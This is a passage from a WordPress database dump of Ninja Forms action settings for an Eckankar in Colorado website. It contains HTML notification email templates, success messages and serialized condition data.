padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>'),(1001,39,'label','Success Message','label','Success Message'),(1002,39,'objectType','Action','objectType','Action'),(1003,39,'objectDomain','actions','objectDomain','actions'),(1004,39,'editActive','','editActive',''),(1005,39,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1006,39,'payment_gateways','','payment_gateways',''),(1007,39,'payment_total','0','payment_total','0'),(1008,39,'tag','','tag',''),(1009,39,'email_message_plain','','email_message_plain',''),(1010,39,'parent_id','10','parent_id','10'),(1011,40,'title','','title',''),(1012,40,'key','','key',''),(1013,40,'type','email','type','email'),(1014,40,'active','1','active','1'),(1015,40,'created_at','2018-01-03 11:42:35','created_at','2018-01-03 11:42:35'),(1016,40,'date_updated','2016-01-19','date_updated','2016-01-19'),(1017,40,'from_name','Colorado RESA Organization Communications','from_name','Colorado RESA Organization Communications'),(1018,40,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1019,40,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(1020,40,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(1021,40,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Colorado RESA Organization Communications</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Colorado RESA organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_6}Â {field:lastname_8}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_6}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_8}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_10}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_9}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_11}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_15}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_16}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p> </p><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Colorado RESA Organization Communications</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Colorado RESA organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_6}Â {field:lastname_8}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_6}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_8}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_10}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_9}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_11}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_15}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_16}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p> </p><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(1022,40,'attach_csv','0','attach_csv','0'),(1023,40,'email_format','html','email_format','html'),(1024,40,'reply_to','','reply_to',''),(1025,40,'cc','','cc',''),(1026,40,'bcc','','bcc',''),(1027,40,'redirect_url','','redirect_url',''),(1028,40,'success_msg','','success_msg',''),(1029,40,'label','Admin Email','label','Admin Email'),(1030,40,'objectType','Action','objectType','Action'),(1031,40,'objectDomain','actions','objectDomain','actions'),(1032,40,'editActive','','editActive',''),(1033,40,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1034,40,'payment_gateways','','payment_gateways',''),(1035,40,'payment_total','0','payment_total','0'),(1036,40,'tag','','tag',''),(1037,40,'email_message_plain','','email_message_plain',''),(1038,40,'drawerDisabled','','drawerDisabled',''),(1039,40,'parent_id','10','parent_id','10'),(1040,41,'title','','title',''),(1041,41,'key','','key',''),(1042,41,'type','save','type','save'),(1043,41,'active','1','active','1'),(1044,41,'created_at','2018-01-03 11:44:03','created_at','2018-01-03 11:44:03'),(1045,41,'label','Save Form','label','Save Form'),(1046,41,'objectType','Action','objectType','Action'),(1047,41,'objectDomain','actions','objectDomain','actions'),(1048,41,'editActive','','editActive',''),(1049,41,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1050,41,'payment_gateways','','payment_gateways',''),(1051,41,'payment_total','0','payment_total','0'),(1052,41,'tag','','tag',''),(1053,41,'to','{wp:admin_email}','to','{wp:admin_email}'),(1054,41,'reply_to','','reply_to',''),(1055,41,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1056,41,'email_message','{fields_table}','email_message','{fields_table}'),(1057,41,'email_message_plain','','email_message_plain',''),(1058,41,'from_name','','from_name',''),(1059,41,'from_address','','from_address',''),(1060,41,'email_format','html','email_format','html'),(1061,41,'cc','','cc',''),(1062,41,'bcc','','bcc',''),(1063,41,'redirect_url','','redirect_url',''),(1064,41,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(1065,41,'submitter_email','','submitter_email',''),(1066,41,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(1067,41,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(1068,41,'set_subs_to_expire','0','set_subs_to_expire','0'),(1069,41,'subs_expire_time','90','subs_expire_time','90'),(1070,41,'parent_id','11','parent_id','11'),(1071,42,'title','','title',''),(1072,42,'key','','key',''),(1073,42,'type','email','type','email'),(1074,42,'active','1','active','1'),(1075,42,'created_at','2018-01-03 11:44:03','created_at','2018-01-03 11:44:03'),(1076,42,'date_updated','2016-01-15','date_updated','2016-01-15'),(1077,42,'attach_csv','0','attach_csv','0'),(1078,42,'email_format','html','email_format','html'),(1079,42,'reply_to','','reply_to',''),(1080,42,'cc','','cc',''),(1081,42,'bcc','','bcc',''),(1082,42,'redirect_url','','redirect_url',''),(1083,42,'success_msg','','success_msg',''),(1084,42,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(1085,42,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1086,42,'to','{field:email_120}','to','{field:email_120}'),(1087,42,'email_subject','Colorado Springs Initiators and ESAâs','email_subject','Colorado Springs Initiators and ESAâs'),(1088,42,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_118},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Colorado Springs Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_118}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_119}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_120}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_121}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_122}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166439207}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_126}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_118},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Colorado Springs Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_118}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_119}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_120}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_121}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_122}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166439207}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_126}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(1089,42,'label','Send copy to user','label','Send copy to user'),(1090,42,'objectType','Action','objectType','Action'),(1091,42,'objectDomain','actions','objectDomain','actions'),(1092,42,'editActive','','editActive',''),(1093,42,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1094,42,'payment_gateways','','payment_gateways',''),(1095,42,'payment_total','0','payment_total','0'),(1096,42,'tag','','tag',''),(1097,42,'email_message_plain','','email_message_plain',''),(1098,42,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(1099,42,'parent_id','11','parent_id','11'),(1100,43,'title','','title',''),(1101,43,'key','','key',''),(1102,43,'type','successmessage','type','successmessage'),(1103,43,'active','1','active','1'),(1104,43,'created_at','2018-01-03 11:44:03','created_at','2018-01-03 11:44:03'),(1105,43,'date_updated','2016-01-15','date_updated','2016-01-15'),(1106,43,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>'),(1107,43,'from_name','','from_name',''),(1108,43,'from_address','','from_address',''),(1109,43,'to','{wp:admin_email}','to','{wp:admin_email}'),(1110,43,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1111,43,'email_message','{fields_table}','email_message','{fields_table}'),(1112,43,'attach_csv','0','attach_csv','0'),(1113,43,'email_format','html','email_format','html'),(1114,43,'reply_to','','reply_to',''),(1115,43,'cc','','cc',''),(1116,43,'bcc','','bcc',''),(1117,43,'redirect_url','','redirect_url',''),(1118,43,'label','Success Message','label','Success Message'),(1119,43,'objectType','Action','objectType','Action'),(1120,43,'objectDomain','actions','objectDomain','actions'),(1121,43,'editActive','','editActive',''),(1122,43,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"mode